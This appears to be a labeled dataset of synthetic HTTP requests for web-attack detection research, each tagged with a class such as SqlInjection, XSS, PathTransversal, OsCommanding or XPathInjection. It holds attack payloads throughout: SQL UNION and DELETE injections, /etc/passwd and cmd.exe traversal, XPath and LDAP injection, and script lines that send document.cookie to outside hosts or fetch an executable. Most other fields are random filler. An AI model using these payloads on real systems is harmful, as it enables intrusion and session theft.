GET /saldouhENrheo/toa6ehritnsIe/1wzratldSDhtlhaet/r1LkQsR0lhvc@/kQD3FRPqmI/htdstbkode/eznmls3w/k9hS8tAvarmail0.css?f6m=051&nxsc=sn%27iwRE+ix%2F3iat&jtt=a8nLAupznls9e&ytwpeuhpoOeyN=9481 HTTP/1.0
Host: 115.150.75.173
Connection: hn3Bl
Accept: */*;q=0.5
Accept-Charset: windows-1252;q=0.9
Accept-Encoding: identity, identity;q=0.8, identity, deflate;q=0.1, deflate;q=0.8
Accept-Language: eme-et5oof;q=0.4, ds4oOoa-shfs;q=0.1, de-on5ar;q=0.0
Cache-Control: no-cache
Client-ip: 234.153.71.59
Cookie: ahoa=&{[window.open('http://208.95.215.86/st.exe'+document.cookie);]};;1njEey4nwlanAew=Hoetd<yoEE\y
Cookie2: $Version="926"
Date: Mon, 11 May 09 12:55:49 CET
ETag: "noJ4iG5GeUVsgnx_w5A"
Expect: 100-continue
From: sydmNoRr@eYicvet9.com
If-Modified-Since: Sun, 12 Apr 09 07:51:20 UTC
If-Unmodified-Since: Tue, 06 Mar 07 09:31:46 CET
If-Match: "_HU-2ifK3TXwH-sR@4Uo"
If-None-Match: "vYtd6PYsdu3duWk-jV"
If-Range: Tue, 13 Apr 10 11:36:16 CET
Max-Forwards: 199
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic c2Fob2lrZDpldHQwcmx1ZQ==
Authorization: pkemAl oAhpr=metcuien
Range: 932-03,777-
Referer: /eEnaeapn.pdf
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.6 (compatible; MSIE 3.6; Solaris; notae; fegig)
UA-Disp: 417,1521,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 450x131
Via: uoat1/1.6 247.165.240.168, 9.8 139.220.211.2
Transfer-Encoding: avii; 4ernEa1=trdwd
Upgrade: oa7ner/6.8, tdsyot/0.1, lom/8.5
Warning: 710 244.32.72.52 "phsreeteta" "Fri, 24 Feb 06 09:05:16 CET"
X-Forwarded-For: 183.144.127.62
X-Serial-Number: 24725262315078744174
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 46704
Start - Id: 41482
class: SqlInjection
PUT /hlgMdcbanpeer/mLN/mvm_t8M_rJVGZ/eSXCfBOk9GEo/oikri58idr3t/a6taiqutkt.shtml? HTTP/1.1
Content-Length: 245
Content-Language: fa,R,eaod7tm
Content-Encoding: compress
Content-Location: http://cEte.uk/e6Oe9t1e/unre0si/mars/pu0nai.msf
Content-MD5: eWFic3Nzc3Z4amVjN3J3cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Aug 07 24:06:58 GMT
Last-Modified: Wed, 21 Dec 05 14:23:57 GMT
Host: 22.158.61.206
Connection: adwlAn
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: all-se0ituo, mo-osasict;q=0.2
Cache-Control: xuieEn='sm3go'
Client-ip: 192.221.33.194
Cookie: mfrnoee=31778785;poelecl5Bs=nfer9Ld;rldbb=92389;mdeNuIoiwA=wn3o1motzsbswr;orne2iere0dVs=752141
Cookie2: $Version="5"
Date: Fri, 10 Apr 09 08:57:39 CET
ETag: "VnPwVfdJ4vTCf5WSay"
Expect: 100-continue
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Wed, 30 Jun 04 06:07:35 UTC
If-Unmodified-Since: Sat, 18 Aug 07 03:58:21 CET
If-Match: "iGC_BYX0E1ngwljI"
If-None-Match: "NGZN@PIl7RTt_FLnOms"
If-Range: Sat, 01 Jan 05 15:56:28 CET
Max-Forwards: 024
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: Basic Y2xic2E6bWJ1ZUU=
Range: 78-403185
Referer: http://www.Oanhh.be/lh6beasu.aspx
TE: gzip;q=0.0
Trailer: Accept-Encoding
User-Agent: E87U/1.9.9.3.3
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8426x777
Via: 8.6 www.ln6oeh.css, FTP/2.5 161.76.234.172:0, FTP/1.8 www.ctaT.html
Transfer-Encoding: seea; mtieaOrd=dwtxeuto
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 644 www.or4te.js "ecd9adohmafA" "Sun, 18 Jan 09 08:09:07 UTC"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 6237226305508453843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rnoael7eop=dt78poH&to7WErlhToa7=leamsrf&RDy4passthru=6747270180&u4ifezet5tddR=s5t_FAq&ehr2aaedDo=dEso otspasswdnasbetween&eroqfsct='  )     UNION ALL     SELECT     001,8532,32,937,83  FROM     xQus   WHERE    (    ''    ='

End - Id: 41482
Start - Id: 38677
class: LdapInjection
GET /2iesybi0rroihE/eZumaj0QaX5teH6itm@/su8w0esutidesc/tesoe0semhomephhe/passthruB7/dOaoeiunfvn/dJW0Zc/EHu/afasti0sstha/4xZ.0TUzVxJoSlB./c2et30sh4oceecezLctn.tiff?eoa=o9WntYq&object9Y7jy7=xuintdrtwrthfsce&ywdbrqtotohIow=2998&udlv=220&eWKOA-=hns%7E%7E%2Fhvwgetwindow.opendla-psuev+0&SwYSjmeta=97810880&kslfpiditIoYl7=9t&6VshutdownViPcB@@u=59363&seshw8trna=dosc%3Bietihotg9+&9nRrn9diReH=pr&psfsea=imde%2Fpositionnw0Qun%27Ag&ieooteou=%29+++%28+%7C+++%28displayName%3Dhad*%29++++%28name+++%3D+had*+%29%28+mail%3Dhad*++%29&0wHoG=767 HTTP/1.0
Host: 35.246.235.194
Connection: close
Accept: */*
Accept-Charset: utf-8, iso-8859-8, euc-kr;q=0.9
Accept-Encoding: compress;q=0.7, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 64.190.230.209
Cookie: 3rwe13tcdnne=f6e;eiud8Npiwg510=29596;PSVkSZdropyqp=oKApv;H0J8n7E=07813;sAnfE=wRidP
Cookie2: $Version="9"
Date: Sun, 06 Aug 06 03:17:33 CET
ETag: "EvxKQQHQRlpZyyner"
Expect: 100-continue
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 06 Mar 05 05:02:56 CET
If-Unmodified-Since: Mon, 26 Apr 10 13:20:51 CET
If-Match: *
If-None-Match: "rUVgjv4c3YPIvHvL-bYf"
If-Range: *
Max-Forwards: 2608
MIME-Version: 5.2
Pragma: rehfi5='bn'
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: Basic OUh0cmJGOlVhOWFF
Range: 39622-,-9614,-81153
Referer: http://www.89usa.gov/nnnenY/nnla7/dpRnTap/oaadqltn.conf
TE: chunked;q=0.0
Trailer: Transfer-Encoding
User-Agent: d53eceeaneb6rgl0ac
UA-Disp: 0550,3953,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7709x7356
Via: FTP/1.7 117.109.23.73, 0.5 www.0rni.tiff
Transfer-Encoding: identity
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 662 www.deregsns.gif:97 "htvam7uh0EcerdZsfa" 
X-Forwarded-For: 0.228.238.16
X-Serial-Number: 7677444389981478018
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38677
Start - Id: 36298
class: PathTransversal
GET /d4kmK5bxL695hrY0Egki/o1rGm3./neSgdnwrfwV6aafyu/i44trNmI9UI3SP4/@a7UP358/utz@_.e71jYE57/bGn2BM/iGWGg901Gte0Z0CskcA/ebyP.sh?bhhnsid9Rssooh4=%3Dpassthru+&2WODK-aUD=rFOi&UCt3Bw0d=95&ummnebalnsas=tmeI&taLxrmaw=ho&aeiljiaehid=%2Fetc%2Fpasswd&2s=rihtaccesPosbi9nshutdown&l2eobnlx7po=hwNXF HTTP/1.0
Host: www.sdieaafma.biz:80
Connection: keep-alive
Accept: video/quicktime;q=0.8, image/jpeg
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=96501
Client-ip: 114.100.144.6
Cookie: eaDamhaeLadrrcs=07267274
Cookie2: $Version="483"
Date: Wed, 01 Sep 04 21:41:42 UTC
ETag: W/"_CMpMj-5Yq9_H_Af87"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Fri, 30 Oct 09 11:07:23 GMT
If-Unmodified-Since: Tue, 15 Apr 08 01:22:10 UTC
If-Match: "a@uRqWbZkK49VqD"
If-None-Match: "JXAedA1i-p0PTnP"
If-Range: Tue, 15 Dec 09 10:21:51 UTC
Max-Forwards: 522
MIME-Version: 7.2
Pragma: md='u'
Proxy-Authorization: Basic Ym1uYTpkaWVmc2Nv
Authorization: NTLM b2ZhN2ZzM25xdGZydGk3VFNyZHRyQXFlYW9scG9mc0t1eXRsZmFlYW5l
Range: 9-463
Referer: http://www.2t9e.ch/nsdseou.txt
TE: deflate;q=0.8,deflate,gzip
Trailer: Host
User-Agent: Mozilla/9.1 (Machintosh; U; PPC 6.9; nl-zm; rv:9.8.5) Gecko/26057231
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 7.8 140.247.82.156:56420
Transfer-Encoding: identity
Upgrade: oafi/4.5
Warning: 777 www.eraf47ht.html "lzrhseSsp9edvonjaeyx" "Fri, 05 Jun 09 03:03:54 UTC"
X-Forwarded-For: 142.213.134.120
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36298
Start - Id: 46047
class: PathTransversal
GET /sM/797XQdsdRGRJm/unaRgoyAdhh2hCa/pse/dvoopArshmka/AeueJI8ICecho/rqetgbinhAuiaoy3/aEratbwrpRPW55/9lKn9Xga.jpg?dhndE=uiabonttapoyel&7wEtue7o0tn0olr=5731950&TQtieiEwa0s=ujwgXT3f8eK&ji6bas4=rl&sqhrrlesnmuoe=6 HTTP/1.0
Host: 71.233.33.146
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Language: e-gan, rs-n, y0bTdaV-b6r;q=0.0
Cookie: r7e0stadrv=allhdt7euj6dnUa;raeeatqseoo=f(;63cmdVprocessing-instruction_aC=aE0XO;5qhleNeas=\.\.\/\.\.\/etc\/passwd;rGdphpK=2289250;incweaZ=pc
Date: Sat, 13 Feb 10 06:18:29 GMT
If-Modified-Since: Fri, 09 Jan 09 22:57:06 CET
If-Match: *
Pragma: no-cache
Referer: http://www.doi6.gov/Tnmr/mowmeTri/getbof1.mpeg
TE: gzip,trailers,trailers
User-Agent: hosKUiC@ http://www.isier.it

null

End - Id: 46047
Start - Id: 49673
class: XPathInjection
GET /iq6jQaeincludeHv3Ntmpqu/fd/ceoaporAa/t7T7t5rleonCa/0kphpDx/ZYYA-qps/ghsmn/4JGILhnf8IKT5elLn6e/eIIvP8/o2Ioh9imgX/rs52famaehQ.asmx?2ehLlaeR=cdOYp5sk&dy3Sctm=zzM987%2Fry8oke%2Fat%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D152%5D+or++%27anIrIhos%27%3D++++%27&KOdropcBt0betweenX=Rw&se=+&8qCW=29849873&npe=0972841738 HTTP/1.1
Host: www.ehse.biz:56
Connection: xisri
Accept: video/*;q=0.3, video/*, application/*;q=0.7
Accept-Charset: big5;q=0.5, koi8;q=0.5, euc-kr, utf-8, iso-8859-5
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 74.210.240.133
Cookie: swrtca7Ti=ioiIbw;ilani4tbser4=egWlbAYFnpv;eomwe9u=64
Cookie2: $Version="85"
Date: Thu, 21 Apr 05 22:47:37 UTC
ETag: W/"8vg1Wz8V9qRfAnK"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Wed, 08 Apr 09 20:11:49 GMT
If-Unmodified-Since: Mon, 06 Mar 06 13:44:48 CET
If-Match: *
If-None-Match: "7yh7PjH.UkEXLT-YYEG"
If-Range: *
Max-Forwards: 73
MIME-Version: 5.9
Pragma: s9t6o=Orf
Proxy-Authorization: fefd 0ae8ehin=q6gL
Authorization: NTLM T3JpeXVuTnlSdGVpYWVpZWwzZXVveHNoamljcWhhdWRFMXRucm91bmxldzBk
Range: -09
Referer: http://i2ddTew.st/oak5yomg.gif
TE: trailers
Trailer: Range
User-Agent: Mozilla/3.9 (X11; U; Linux i386 4.8; aT-T1; rv:5.5.4) Gecko/59787922
UA-CPU: Sparc
UA-Disp: 6990,614,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 491x233
Via: 4.0 www.YtdEt.gif, oeAt/8.1 197.64.186.196, 5.3 www.yNte.png
Transfer-Encoding: identity
Upgrade: la4ei/4.5, aaege/0.3, qwny/8.0, Ejp/0.3, Erai/6.3
Warning: 731 www.em2ety7n.htm "ewloieirse6ett" 
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49673
Start - Id: 35299
class: SqlInjection
GET /OBJ93Sj/eBtycidafTsnrtusdejC/aXNOSgumFH8lj9d/beaoosrtee/9.RmwOaeFfHv/hu1N/sRKMecuR1j/hnnmno0er/eiyljl8-S/nt/fKYCdR4iI-@zFJjQGd4x.js?Ese=formmnN6stdinJ-naebihn%28r&eeonts1Q8s8E=btesUnu&orslveEa1Ne=ya%2F&se=atgc&ntt63honr=szl%7Eumaogi%40cmen&ocoifnto=yv+rh1atl&o0eenrlht=lcce1rni&hnEznmtSuui=%27+OR+++++%27amwcW4%27++++%3D+N%27+ HTTP/1.0
Host: 122.216.119.93
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 213.3.132.26
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="0"
Date: Mon, 06 Mar 06 24:24:22 CET
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: 100-continue
From: bohfsrn3@6agvleeeda.com
If-Modified-Since: Wed, 07 Apr 04 02:18:13 CET
If-Unmodified-Since: Fri, 24 Nov 06 01:20:17 CET
If-Match: "@Rz5jkyRfCO5NwkJ0P"
If-None-Match: "nKhvYL@HW57.tz6."
If-Range: "9Me-gDD9gfiCN5PioDce"
Max-Forwards: 86
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="wwob"
Authorization: Digest nonce
Range: 930-456,2355-
Referer: /hta2Hot/79iceTi.avi
TE: trailers,trailers
Trailer: Trailer
User-Agent: r8rrsT (hCOZey@hRA; ifaGRA)
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 048x605
Via: 7c4/0.5 www.l4jo36ex.gif:1, aypN/6.3 www.ehtaaloz.html, HTTP/6.6 www.soeo.shtml
Transfer-Encoding: deflate
Upgrade: dn44o/1.3
Warning: 350 4.215.62.223 "thrrt0nq8ftawYt2rl5" "Sun, 30 Nov 08 19:51:23 GMT"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 019195237
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35299
Start - Id: 45290
class: PathTransversal
GET /sU-gncwHBPEhtaccesnl/dpy3s3euxadiin/lTEXo@cxtermqftpy/nJFUsXA1CkP4jY/stfsalomseiipsn3qtnw/td1e.cgi?zrre9sRoole=eaesa1f1EW2&vnj1i=Dt%26%25ds&sejigdedtaao=56008747&aKw9DMbgsound=en&ottkvsh0efw0lp=t%27&er4Oxe=307899&rt4edn=tiWZu6&n5dut1ter=bT%240me+nhRrtL%24%3Cne HTTP/1.0
Host: 249.173.98.71:87
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, deflate;q=0.1, deflate
Accept-Language: 6ii4eE6-soihw4nm;q=0.9, nsft-euao6mo, dp-eoaaSlc, i-a
Cache-Control: no-store
Date: Tue, 12 Dec 06 05:04:19 CET
ETag: W/"gsD6M81G-HKpC32"
If-Unmodified-Since: Thu, 09 Nov 06 08:02:12 CET
If-Match: "hpA_c4uMzqxEeF3nvdOy"
If-None-Match: "vy26I@I4OMlfY.MxNNn"
If-Range: "hyENtioC0J02xo6XEf"
Max-Forwards: 17
Pragma: no-cache
Referer: /chaao5/jOsW.mdb
TE: trailers,trailers,chunked;q=0.1
User-Agent: /../../../../Inetpub/iissamples/orta/er/il/de.sh
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45290
Start - Id: 49924
class: XPathInjection
GET /r3tws.jpeg?re=%2FetEbvbscriptVob&Mra=cet&7dsacpjhtoa=s&SynZ0=scripteyoogtfihttps&enlai3sopYatror=49&sAnOwtuordse=optdhcmd&ire=ara0gOet%27+++++or+++s%2Fr%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D55%5D++or+%27ec7a%27%3D++%27&swgt=tmpsaH&epfaiaITefo=oVqjjre&Pr0replace4VMhttpT=r%7E&e6wmrila7etmAE=8709&xj5xn5nsr1fo=7662 HTTP/1.1
Host: www.dhRotbe.com:80
Connection: keep-alive
Accept: text/plain;q=0.0, image/*;q=0.5, video/mpeg;q=0.0
Accept-Charset: euc-kr, utf-8, iso-8859-3;q=0.7, iso-2022-kr, windows-1255;q=0.6
Accept-Encoding: compress, gzip;q=0.4, deflate;q=0.5, deflate;q=0.7, deflate;q=0.8
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 69.149.110.120
Cookie: lSg2ze=hrifedars;s0rE=88673994
Cookie2: $Version="455"
Date: Wed, 04 Jan 06 06:44:17 CET
ETag: "-PkzT_C75R64usx5m"
Expect: 100-continue
From: anuul0@opadyrcN.cz
If-Modified-Since: Sun, 04 Nov 07 11:22:48 GMT
If-Unmodified-Since: Sat, 09 Jan 10 12:25:30 CET
If-Match: *
If-None-Match: "-qar3BtqTmqqCzj@"
If-Range: Sun, 20 Dec 09 04:07:32 GMT
Max-Forwards: 7
MIME-Version: 7.8
Pragma: gci=cj
Proxy-Authorization: Basic bmJ2ZWFpcjpoZWk0cmhhVA==
Authorization: besh 2agae=u9pira
Range: -3
Referer: /o6te.msf
TE: deflate
Trailer: Host
User-Agent: iJBZm8No http://www.rcT7u.it
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 5.1 249.51.174.127, 2.5 www.xoHhg8S.js
Transfer-Encoding: compress
Upgrade: qfe/8.0
Warning: 682 www.f0shh3eu.jpeg "tocdihgtUi" "Fri, 20 Feb 04 11:54:19 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 2013029504
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49924
Start - Id: 41225
class: SqlInjection
GET /u3B9vsQYuwuhAj9_I/iq.go4O/enjuetsuOebnrdaa8lo/aSZibwwq/eEaaoEno/wwULcsLG_qRhg1MeKj3A/bRnn2@mTzZu-Ven5LM3.php4? HTTP/1.0
Host: 176.255.172.119:71
Connection: Tsno
Accept: image/png
Accept-Charset: windows-1255, windows-1251, utf-7;q=0.2, x-mac-icelandic
Accept-Encoding: 
Accept-Language: Ptehfur2-pdh2we, AtosNn-sh4i, wh54iyn-bl;q=0.6
Cache-Control: only-if-cached
Client-ip: 206.238.177.255
Cookie: lfu63Aemrchdy=rheT/;vbscriptU-EoNZ=ra;ntlslRHat=ceLateae0dudiv;e1tbio=1ci1hNdyre;gwyairTgEd6a=17;ioahgcN=320852
Cookie2: $Version="006"
Date: Fri, 27 Oct 06 20:16:36 GMT
ETag: W/"5ZTrgczviWtaDg7uhH"
Expect: stfhep2=ec7t3;aiefhny=dsiN9dg
From: eoinuyii@2ot3t.net
If-Modified-Since: Mon, 10 Dec 07 18:48:41 GMT
If-Unmodified-Since: Sat, 07 Apr 07 21:45:58 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Mar 04 05:13:58 UTC
Max-Forwards: 5775
Pragma: ocst81en='tbnPE'
Authorization: Digest qop=auth
Referer: /klOvdnbn/hlip/alaNfi/txdw.mp3
TE: trailers,chunked,trailers
User-Agent: or    0<>(select     count(*)   from   ne)
UA-CPU: 68000
UA-Color: color32
UA-Pixels: 5345x867
Via: FTP/9.9 244.199.21.118
Transfer-Encoding: deflate
Upgrade: t4nl/2.0, rRkw/3.5, nqe/4.4
X-Serial-Number: 54822756786329442
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41225
Start - Id: 43697
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.hshRg2iiaz.net
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254, euc-kr, ks_c_5601-1987;q=0.5
Accept-Encoding: 
Accept-Language: wau-j, i-rHoe, is-d;q=0.4, advm1-yQiceLe
Cache-Control: only-if-cached
Client-ip: 152.233.157.213
Cookie: tsnei=z;emsAfaeRhgeuelu=uGo5nc36siatse;qGv1p= g8grLhp4/oE;b9dHyytebMAdDrb=9snrsgyd\;wqt=2ai
Cookie2: $Version="51"
Date: Sat, 27 Feb 10 10:14:13 CET
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 7lboei
From: efdn@eboax.net
If-Modified-Since: Tue, 22 May 07 06:19:44 GMT
If-Unmodified-Since: Thu, 18 Dec 08 20:39:07 CET
If-Match: "mJJG3z@q5TiwxT8jCP@"
If-None-Match: *
If-Range: "ayE5StEBc5.RGeB-K"
Max-Forwards: 0
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest cnonce="gbd9a8u"
Range: 0932-655,7-822597,-7
Referer: http://mvij8.org/nauxu/Hleh/oel3H/wanwhea/wkfso0Hu.tar.gz
TE: trailers,deflate;q=0.7
User-Agent: ecaetn
UA-CPU: StrongARM
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: HTTP/9.4 www.rtesos4i.gif
Transfer-Encoding: compress
Upgrade: as8/8.8, mad/2.6, pEyuj/1.9, o5a8/8.7, ewmi2m/5.2
Warning: 158 www.shecn.js "Itetalhi5ooybnjthhbi" "Tue, 24 Jun 08 17:50:39 GMT"
X-Forwarded-For: 51.55.191.62
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 43697
Start - Id: 35390
class: SqlInjection
GET /tBzYfcS/syu63/19iOqrLy3DnCKbGrPv/evalOmetai7rtkiUmGf/zciet/9zBk/f9kCIdk_sEYSa02PUD/Kj51gHnL4CePig4/nr9vcnMt0mTekstF/tdfM.mxLWIc7/k7-EJ36-.asmx?wzfRWrRyKEU=hhttpsA0%7C&Eyz0=Nehtttntesaahhtl&UesdoeRYu=5428&U5J0a%uyNUC0=5Vy99yBP&Jang2eot=ri3H1se%27+++%29%3B++DEL%2F**%2FETE++++FROM++users+++++WHERE++upper%28username%29+++++%3D+++++upper%28++%27admin&l0=s%5Cs-l HTTP/1.1
Host: 235.106.187.22:1
Connection: mdsa8
Accept: image/*;q=0.2, application/*, image/*;q=0.8
Accept-Charset: us-ascii;q=0.4
Accept-Encoding: 
Accept-Language: gketso1-isz;q=0.5, 6twvmfs-his5
Cache-Control: W99o='gBh'
Client-ip: 190.92.194.186
Cookie: ati5steu=xtermmnir;ploEs=08516422;eo=71
Cookie2: $Version="20"
Date: Mon, 25 Aug 08 20:27:28 UTC
ETag: W/"1zpGD6YngN8ikJCz7Uio"
Expect: ta1Ecwsh=4waohsyh;84resi=rttalif
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Mon, 12 Apr 10 15:52:10 GMT
If-Unmodified-Since: Tue, 19 May 09 06:51:15 UTC
If-Match: "4nelpuV@OWJGSxHGJ"
If-None-Match: "ohWC_3App6WkEvSDwF"
If-Range: *
Max-Forwards: 4
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlEb1RhQXNodXNobmt0cmVlNnMxbnVoc0ljb2xsaWdjZW1z
Authorization: tfdyi wetoINl=Wpol
Range: 55-,0-,6611-
Referer: http://HeIqs.gov/lYdjXm8/hodnas/oEeRttl/adiiEa/ia3trifo.jsp
TE: trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.3 (compatible; Konqueror/4.3; WinNT; htsntqrit; cneohutbB; dnGraDeet)
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 177x860
Via: FTP/2.4 88.175.11.153:85, 3.7 84.58.189.38
Transfer-Encoding: compress
Warning: 933 134.218.228.163:17 "vrrEhe411r" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 840148
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35390
Start - Id: 46968
class: XSS
GET /2GLSsYUb2o.De9/rAR/cloKbLC/ssaxbairo3as1/hH6.css?edt=lSutna&nxIOoenu4rna=%3Cimg++src+++%3D+%22++++javascript%3A+%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.st.com%2Fcgi-bin%2Fge.cgi%27%2Bdocument.cookie%29%3B%5D+%22++%3E&rsElTi1ipn3u=isth HTTP/1.1
Host: www.rseorgs0eT.com
Connection: nzcu
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: amo18tEp-tA9R;q=0.1, r-msnroi
Cache-Control: only-if-cached
Client-ip: 62.241.33.36
Date: Mon, 25 Jul 05 19:40:50 GMT
Expect: an850
If-Modified-Since: Sun, 15 Oct 06 13:53:38 CET
If-Unmodified-Since: Sun, 15 Mar 09 18:17:48 UTC
If-Match: *
Max-Forwards: 844
Authorization: ignyr oIhak=inleboh
Referer: http://www.atWdmig.it/z1wchndn/Fts8aoI/tnH4i/phO3UD.mdb
TE: trailers,deflate,trailers
User-Agent: Mozilla/5.7 (X11; U; Linux i386 8.8; nR-t5; rv:4.8.1) Gecko/83465002
Via: 4.2 www.l1oIjreu.css:406, 3.2 187.219.246.141, 2.0 www.osskscEi.htm
Transfer-Encoding: deflate
Warning: 851 www.iRa0dmoc.js "OTesetongilrtiwreAm" 
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46968
Start - Id: 49221
class: XPathInjection
GET /pipS4w9gaS.php4?wssahrdgttqda=%3Fp&37wld5zrUeiT19i=sm1iPY2c_&7gclhhm=tDMeuoN&b0FNM=asbgsound-m26%3CNa+libro%29o&r8liwls9lAIo=8&naeiagudnrNae=02e%400p&vCL3C=79xN6qnGH&neqe=d&oetuRaaanf=cah%27+or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++++%27lerlyfe4%27+++%3D++++%27&0iq=%2Ble&ijihtsnrfeahrwt=n%3Ftaneestyleisutp HTTP/1.0
Host: 107.64.206.122:4
Connection: 0nty
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 22.111.61.54
Cookie: LZ1uM-.t_m=026544979
Cookie2: $Version="95"
Date: Fri, 19 Mar 04 04:49:56 UTC
ETag: W/".LjgfHBmPjs0naDs"
Expect: 100-continue
From: 92fxf@rrjet00.biz
If-Modified-Since: Thu, 23 Sep 04 21:10:53 CET
If-Unmodified-Since: Fri, 03 Oct 08 09:10:55 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 25 Nov 09 17:33:55 CET
Max-Forwards: 79
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: NTLM NldvSWhnaGRJaXNuMTNtZ2VvMzdzb2xhdG5tZnJ1cnRwbGxleG9haWlTemx0
Range: 71585-306995,35906-412,408956-74
Referer: http://eatnbm9s.gov/tGnsh/wtf8satt/oa2t4e.cfm
TE: trailers
Trailer: TE
User-Agent: aDhjteeIoefdoOiu9
UA-CPU: StrongARM
UA-Disp: 2354,727,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6245x946
Via: 8.5 66.12.191.99
Transfer-Encoding: deflate
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 104.165.218.9
X-Serial-Number: 094897870
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49221
Start - Id: 49270
class: XPathInjection
GET /eM/ersdiee8/nhdDgebRsidacsodttis/9HMI/nOxtnYx/taHvraha8eeeXur5cd.shtml?4wRe=ap4i5adfaaOfe&Ens9eaBtc=400379677&Kaccess_log@6R6@F=79&pil=865&aerfnkytitslati=8+++++or+++1%3C+++++et%2FfN%2Fsde%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D223%5D+or+++++2%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: 247.154.36.184
Connection: adhl
Accept: text/xml
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: cv-ds, dAEw-intywi
Cache-Control: only-if-cached
Client-ip: 88.174.167.80
Cookie: e4idettwren=7331;mtaenttoehOzcnO=hle/rfx
Cookie2: $Version="3"
